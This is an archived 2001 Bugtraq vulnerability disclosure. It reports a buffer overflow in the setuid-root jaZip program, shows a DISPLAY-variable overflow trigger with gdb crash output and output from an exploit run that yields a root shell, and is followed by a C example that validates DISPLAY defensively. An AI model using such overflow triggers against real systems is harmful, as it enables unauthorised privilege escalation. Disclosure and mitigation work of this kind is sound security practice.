From: teleh0r (teleh0rDOGLOVER.COM)
Date: Sun Jan 14 2001 - 11:05:48 CST


    Dear Bugtraq,

    jaZip is a program for managing an Iomega Zip or Jaz drive.
    It is often installed setuid root - and because of a buffer
    overflow it is possible for regular users to become root.

    Please excuse me if this was known. Please note that I cannot
    guarantee that this information is correct.

    Tested rpm:
    ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
    RPMS/jaZip-0.32-2.i386.rpm

      [rootlocalhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
      [rootlocalhost /root]# gdb /usr/X11R6/bin/jazip
      GNU gdb 19991004
      Copyright 1998 Free Software Foundation, Inc.
      (gdb) r
      Starting program: /usr/X11R6/bin/jazip

      Program received signal SIGSEGV, Segmentation fault.
      0x41414141 in ?? ()
      ----
      [teleh0rlocalhost teleh0r]$ rpm -q jaZip
      jaZip-0.32-2
      [teleh0rlocalhost teleh0r]$ ./jazip-exploit.pl
      Address: 0xbffff7ac
      bash#

    Exploit attached.

    Sincerely yours,
    teleh0r

    --
    To avoid criticism, do nothing, say nothing, be nothing.
                    -- Elbert Hubbard
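The defensive counterpart to the bug described above, as an added example that is not code from the post or from jaZip: the crash at 0x41414141 after setting DISPLAY to 2100 bytes suggests the value is copied into a fixed buffer, which is assumed here rather than confirmed by the post; the function names, the 256-byte limit and the character whitelist are the example's own choices.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Generous bound for a "host:display.screen" string; longer is hostile. */
#define DISPLAY_MAX 256

/* Copy an environment value into a fixed buffer, refusing anything that
 * does not fit instead of overrunning or silently truncating it.
 * Returns 0 on success, -1 if the value is unset, empty or too long. */
int copy_env_bounded(const char *value, char *dst, size_t dst_len)
{
    if (value == NULL || dst_len == 0)
        return -1;
    size_t n = strnlen(value, dst_len);   /* never scans past dst_len */
    if (n == 0 || n == dst_len)           /* empty, or no room for NUL */
        return -1;
    memcpy(dst, value, n);
    dst[n] = '\0';
    return 0;
}

/* Reject control bytes and shell metacharacters: a setuid program may pass
 * DISPLAY on to helpers, so only plain printable ASCII is accepted. */
int display_looks_sane(const char *display)
{
    for (const char *p = display; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c < 0x20 || c > 0x7e || strchr("$`;|&<>\\\"'", c))
            return 0;
    }
    return 1;
}

/* Read DISPLAY with both checks; -1 means "fall back to the X default". */
int get_display_checked(char *dst, size_t dst_len)
{
    if (copy_env_bounded(getenv("DISPLAY"), dst, dst_len) != 0)
        return -1;
    return display_looks_sane(dst) ? 0 : -1;
}

int main(void)
{
    char display[DISPLAY_MAX];
    int ok = get_display_checked(display, sizeof display);
    printf("%s\n", ok == 0 ? display : "DISPLAY rejected; using X default");
    return 0;
}
```

Run with the same `export DISPLAY=$(perl -e 'print "A"x2100')` as in the post and the program rejects the value instead of crashing.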